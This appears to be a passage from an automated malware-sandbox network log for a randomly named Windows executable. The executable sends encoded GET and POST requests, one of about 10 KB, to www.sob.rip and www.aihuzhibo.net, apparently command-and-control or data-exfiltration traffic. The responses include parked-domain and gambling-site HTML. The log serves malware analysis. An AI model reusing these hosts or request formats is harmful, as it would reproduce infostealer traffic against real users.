                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==
                                                                                                                                                                                                                                              set-cookie: parking_session=145aefb2-d1c7-42bf-8667-82fa82c9bdb9; expires=Mon, 23 Dec 2024 03:24:23 GMT; path=/
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6c 55 62 2b 70 7a 77 44 6f 6c 6f 32 4d 2b 6c 4b 61 30 61 6d 61 6a 65 35 62 6a 58 7a 49 42 68 34 7a 49 77 35 6c 35 2b 41 44 4f 44 35 6a 63 45 79 36 4c 78 4f 50 4d 42 6e 45 79 69 75 4f 49 57 67 48 4f 33 32 30 71 45 71 52 4d 73 68 76 54 46 4c 56 74 59 46 62 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180682898 CET547INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTQ1YWVmYjItZDFjNy00MmJmLTg2NjctODJmYTgyYzliZGI5IiwicGFnZV90aW1lIjoxNzM0OTIzMz


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              16192.168.2.449909199.59.243.227804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.735997915 CET418OUTGET /w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.sob.rip
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.824857950 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:09:24 GMT
                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                              content-length: 1422
                                                                                                                                                                                                                                              x-request-id: 46682363-594a-433a-8a6a-d02f5acf7732
                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zYWP8Y3M5s4/N81Zjp5eLQIk0XBn+pwUu7Q28N35t3W3XrDSnlOoDW3Kkx03bKS6B7eNlbkNF6ydmX8SX2sQKg==
                                                                                                                                                                                                                                              set-cookie: parking_session=46682363-594a-433a-8a6a-d02f5acf7732; expires=Mon, 23 Dec 2024 03:24:25 GMT; path=/
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 59 57 50 38 59 33 4d 35 73 34 2f 4e 38 31 5a 6a 70 35 65 4c 51 49 6b 30 58 42 6e 2b 70 77 55 75 37 51 32 38 4e 33 35 74 33 57 33 58 72 44 53 6e 6c 4f 6f 44 57 33 4b 6b 78 30 33 62 4b 53 36 42 37 65 4e 6c 62 6b 4e 46 36 79 64 6d 58 38 53 58 32 73 51 4b 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zYWP8Y3M5s4/N81Zjp5eLQIk0XBn+pwUu7Q28N35t3W3XrDSnlOoDW3Kkx03bKS6B7eNlbkNF6ydmX8SX2sQKg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.824978113 CET875INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDY2ODIzNjMtNTk0YS00MzNhLThhNmEtZDAyZjVhY2Y3NzMyIiwicGFnZV90aW1lIjoxNzM0OTIzMz


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              17192.168.2.449928192.186.58.31804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.542052031 CET692OUTPOST /gkfy/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.aihuzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.aihuzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.aihuzhibo.net/gkfy/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 35 35 43 34 6d 7a 63 32 33 33 76 70 46 52 59 6f 53 54 4d 70 73 39 47 67 43 71 32 4a 2b 57 79 76 65 2f 53 43 44 30 38 79 63 47 56 62 68 6c 36 62 73 48 4b 6a 72 42 51 37 4f 66 43 50 41 53 36 50 4c 61 6b 73 6c 39 2b 52 4b 37 63 33 70 75 42 55 39 35 58 30 43 56 54 44 39 71 4a 4c 34 43 4e 55 42 41 71 61 72 4a 6b 74 4b 75 4c 41 32 5a 56 44 57 6d 31 6e 51 74 31 4e 41 4a 31 61 59 63 57 57 31 39 37 62 6b 74 75 64 75 43 51 68 4d 6f 49 4e 43 32 4c 49 45 55 45 71 70 33 52 46 45 68 5a 48 49 54 51 74 38 63 53 49 35 6d 77 2f 66 71 65 4e 35 57 4b 2f 36 6b 6d 42 70 6d 44 42 45 64 68 73 2b 77 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=55C4mzc233vpFRYoSTMps9GgCq2J+Wyve/SCD08ycGVbhl6bsHKjrBQ7OfCPAS6PLaksl9+RK7c3puBU95X0CVTD9qJL4CNUBAqarJktKuLA2ZVDWm1nQt1NAJ1aYcWW197bktuduCQhMoINC2LIEUEqp3RFEhZHITQt8cSI5mw/fqeN5WK/6kmBpmDBEdhs+w==
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125607967 CET190INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:09:32 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: d404 Not Found0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              18192.168.2.449935192.186.58.31804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.208802938 CET712OUTPOST /gkfy/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.aihuzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.aihuzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.aihuzhibo.net/gkfy/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 35 35 43 34 6d 7a 63 32 33 33 76 70 45 78 49 6f 4a 77 30 70 75 64 47 6a 4e 4b 32 4a 6e 47 79 30 65 2f 4f 43 44 31 4a 2f 63 56 78 62 69 45 4b 62 74 47 4b 6a 73 42 51 37 47 2f 43 4b 4f 79 36 49 4c 61 59 43 6c 35 32 52 4b 37 59 33 70 72 6c 55 39 4f 37 33 43 46 54 4e 38 61 4a 4a 38 43 4e 55 42 41 71 61 72 4a 67 4c 4b 75 44 41 32 4a 6c 44 45 53 70 67 5a 4e 31 4f 48 4a 31 61 4f 63 57 53 31 39 37 39 6b 73 7a 34 75 45 4d 68 4d 71 51 4e 43 69 66 48 52 6b 45 6b 32 6e 51 77 4d 51 77 37 50 48 4a 5a 33 4d 65 6f 38 6d 67 2b 65 73 54 58 6f 6e 72 6f 6f 6b 43 79 30 68 4b 31 4a 65 63 6c 6c 79 4d 7a 4e 42 59 48 48 7a 34 30 4d 4c 43 2b 49 76 6d 71 6e 6e 38 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=55C4mzc233vpExIoJw0pudGjNK2JnGy0e/OCD1J/cVxbiEKbtGKjsBQ7G/CKOy6ILaYCl52RK7Y3prlU9O73CFTN8aJJ8CNUBAqarJgLKuDA2JlDESpgZN1OHJ1aOcWS1979ksz4uEMhMqQNCifHRkEk2nQwMQw7PHJZ3Meo8mg+esTXonrookCy0hK1JecllyMzNBYHHz40MLC+Ivmqnn8=
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790000916 CET190INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:09:35 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: d404 Not Found0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              19192.168.2.449942192.186.58.31804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.865643978 CET10794OUTPOST /gkfy/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.aihuzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.aihuzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.aihuzhibo.net/gkfy/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 35 35 43 34 6d 7a 63 32 33 33 76 70 45 78 49 6f 4a 77 30 70 75 64 47 6a 4e 4b 32 4a 6e 47 79 30 65 2f 4f 43 44 31 4a 2f 63 56 35 62 68 32 43 62 69 42 32 6a 74 42 51 37 61 76 43 4c 4f 79 36 56 4c 61 41 4f 6c 35 79 72 4b 35 51 33 6f 4a 74 55 37 38 44 33 4d 46 54 4e 35 71 4a 4d 34 43 4e 6b 42 44 43 57 72 4a 77 4c 4b 75 44 41 32 4c 4e 44 55 57 31 67 56 74 31 4e 41 4a 30 4f 59 63 57 71 31 39 69 49 6b 73 33 43 75 33 55 68 4d 4b 41 4e 42 52 33 48 54 45 45 6d 31 6e 51 6f 4d 51 73 65 50 47 68 6a 33 50 43 4f 38 6b 38 2b 63 72 71 62 37 56 61 72 33 57 4f 37 6f 43 76 54 43 38 34 65 67 43 67 72 63 42 4e 62 51 33 38 6b 4c 62 7a 58 61 2f 47 67 77 68 77 72 32 74 64 6d 6a 37 50 42 54 52 35 4c 52 7a 76 41 68 71 72 77 68 64 4e 78 44 67 6c 4f 57 52 53 68 6a 72 70 4e 50 32 35 35 71 4e 53 45 69 52 79 43 77 69 69 61 30 54 66 53 32 36 70 4d 2f 37 68 78 49 41 57 2f 79 71 7a 31 72 72 53 46 68 52 48 38 78 71 42 64 57 78 34 2f 4f 67 79 44 76 45 58 58 48 79 73 4e 77 70 67 4f 50 6c 50 65 67 54 31 2b 73 78 67 62 33 61 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4v7=55C4mzc233vpExIoJw0pudGjNK2JnGy0e/OCD1J/cV5bh2CbiB2jtBQ7avCLOy6VLaAOl5yrK5Q3oJtU78D3MFTN5qJM4CNkBDCWrJwLKuDA2LNDUW1gVt1NAJ0OYcWq19iIks3Cu3UhMKANBR3HTEEm1nQoMQsePGhj3PCO8k8+crqb7Var3WO7oCvTC84egCgrcBNbQ38kLbzXa/Ggwhwr2tdmj7PBTR5LRzvAhqrwhdNxDglOWRShjrpNP255qNSEiRyCwiia0TfS26pM/7hxIAW/yqz1rrSFhRH8xqBdWx4/OgyDvEXXHysNwpgOPlPegT1+sxgb3a7lyyh8XbPSpQzjGiC3nytbkwiC5LhWWmRqDodgeSUMvnyOfavg7dQR2JZJyMF1KUCLUtqzua7RwVqJVFt5wpmO/tfpcnXfrkLiEH2zRxAgVnqgyXxiHsyPpV6t6bYqGtZjWGKWy3k9ct9e345M1Co3iEDDeeBX4DkhuS2YgZ8OxT0LQmo4MGOqYt+kTkX8ol8v8D/lZYo8PREn1YU3PHbby7MuOqIp7BDhwduuTYEoc390U7+pujCwJ7lfoDEoGoUq+ATVm+ZN5XK4lyBTmoPuhBwLfdybtP+yKvUboVJg4Ymh8+0HmwuPHvNG4BekX2Nn6/hbat5mFadFVkSwRIjsq/kx5ROJR7GiqFseTjcfFdETDsVJ3L6nfykGhjUUyLsvkPBkz84vlJpuRBS8fWUX4XZYTGkts1257yxyKwsyiVdXaREA336qCXJNo/XbDZ5N0HI9B35zEXXp58Ru630c7ykgvm/+7kOTbPCQe5QCQ/44/VgTWCZjkok4s6xe8Rr+GkbxBMkpysSGyM5kwwKQ6JId2vOzL44dzEy8yAhxVpOct5wlN7jKZCQ9aFs56Mvkr+2cXQAhGMFRmmdjptGMd9S1yvzLPj8pDo6zsbNorWZtp+NEW/Qn2ZOdBVlyHBZpHToi2uaer3vk7DFaSSVK5O+5hZJ7aAj9 [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              20192.168.2.449948192.186.58.31804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.518012047 CET424OUTGET /gkfy/?4v7=07qYlGdy+WbqOk0cXAw1tsG+BYjZolWoNNS4BkQ+NnlSijGpnUaEsXAiEpeyBCiqWtAN48ClO71D0ZdXiZHmAUTm7Ixf7FFoVzGex49KD8u42uAoUmpEbrc=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.aihuzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161214113 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:09:40 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Data Raw: 66 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 63 6d 6e 2d 48 61 6e 73 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 26 23 33 35 39 31 30 3b 26 23 32 32 39 30 32 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 33 34 33 33 3b 26 23 32 31 33 33 31 3b 26 23 32 39 32 35 36 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 32 34 35 35 35 3b 26 23 33 36 38 39 35 3b 26 23 33 36 38 39 30 3b 26 23 33 36 39 34 37 3b 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 35 39 31 30 3b 26 23 32 32 39 30 32 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 ef b8 8f f0 9f 8f ad 26 23 32 37 34 32 36 3b 26 23 33 36 38 31 34 3b 26 23 32 30 33 35 31 3b 26 23 32 39 39 39 32 3b f0 9f 8e ac 26 23 33 35 39 31 30 3b 26 23 32 32 39 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>&#35910;&#22902;&#30452;&#25773;&#23433;&#21331;&#29256;&#19979;&#36733;&#24555;&#36895;&#36890;&#36947;</title><meta http-equiv="keywords" content="&#35910;&#22902;&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;&#35910;&#22902;&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,&#35910;&#22902;&#30452;&#25773;&#23433;&#21331;&#29256;&#20840;&#29256;&#26412;&#19979;&#36733;&#27719;&#24635;&#38500;&#20102;&#36164;&#35759;&#21644;&#30452;&#25773;&#36824;&#20250;&#20026;&#24744;&#25552;&#20379;&#19987;&#19994;&#30340;&#25968;&#25454;&#20998;&#26512;&#26381;&#21153;&#25105;&#20204;&#30340;&#25968;&#25454;&#20998;&#26512;&#28085;&#30422;&#22810;&#31181;&#36816;&#21160;&#39033;&#30446;&#21253;&#25324;&#36275;&#29699;&#31726;&#29699;&#32593;& [TRUNCATED]
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161362886 CET1236INData Raw: 23 32 30 39 39 38 3b 26 23 32 36 35 31 32 3b 26 23 31 39 39 38 31 3b 26 23 32 30 31 36 35 3b 26 23 32 31 32 35 33 3b 26 23 32 35 33 32 34 3b 26 23 32 37 36 30 34 3b 26 23 33 36 31 38 37 3b 26 23 32 35 39 36 38 3b 26 23 32 35 34 35 34 3b ef bc 8c
                                                                                                                                                                                                                                              Data Ascii: #20998;&#26512;&#19981;&#20165;&#21253;&#25324;&#27604;&#36187;&#25968;&#25454;&#36824;&#20250;&#20026;&#24744;&#25552;&#20379;&#29699;&#21592;&#25968;&#25454;&#21644;&#29699;&#38431;&#25968;&#25454;&#35753;&#24744;&#26356;&#22909;&#2232
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161401987 CET1236INData Raw: 69 63 2f 63 73 73 2f 70 63 6d 6f 64 75 6c 65 2e 65 64 64 34 36 33 38 63 35 63 33 62 33 30 33 39 38 33 32 33 39 30 32 36 39 64 34 30 66 31 64 38 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d
                                                                                                                                                                                                                                              Data Ascii: ic/css/pcmodule.edd4638c5c3b3039832390269d40f1d8.css"><link rel="stylesheet" href="http://www.aihuzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb034.css"></head><body cache-app-id="87215" data-app-id="8456
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161441088 CET1236INData Raw: 2f 74 65 6d 70 6c 61 74 65 2f 6e 65 77 73 2f 77 61 6e 64 6f 75 6a 69 61 2f 73 74 61 74 69 63 2f 6a 73 2f 72 65 61 6c 4e 61 6d 65 41 75 74 68 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69
                                                                                                                                                                                                                                              Data Ascii: /template/news/wandoujia/static/js/realNameAuth.js" crossorigin="anonymous"></script><script type="text/javascript" src="http://www.aihuzhibo.net/template/news/wandoujia/static/js/nc.js"></script><script type="text/javascript" src="http://www.
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161495924 CET896INData Raw: 68 2d 62 74 6e 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 73 6f 75 72 63 65 22 20 76 61 6c 75 65 3d 22 64 65 74 61 69 6c 22 3e 3c 2f 66 6f 72 6d 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 35 61 38 33 61
                                                                                                                                                                                                                                              Data Ascii: h-btn"><input type="hidden" name="source" value="detail"></form><small lang="5a83a6"></small><sup draggable="b2b1ca"></sup><time dropzone="db3e73"></time><div lang="4f2fc5" class="l05c9c user-info"><img draggable="a26271" class="m8910c avatar"
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161534071 CET1236INData Raw: 70 70 22 3e 3c 73 70 61 6e 3e e8 bd af e4 bb b6 e5 88 86 e7 b1 bb 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 75 63 38 31 34 30 20 20 68 61 73 2d 73 75 62 73 20 6e 61 76 2d 69 74 65 6d 20 67 61 6d 65 2d 74 61
                                                                                                                                                                                                                                              Data Ascii: pp"><span></span></a></li><li class="uc8140 has-subs nav-item game-tag-wrap"><a class="v06cd9 game-tag first-link" href="/game"><span></span></a></li><li class="weda99 nav-item"><a class="x7e04d first-link" href="/top
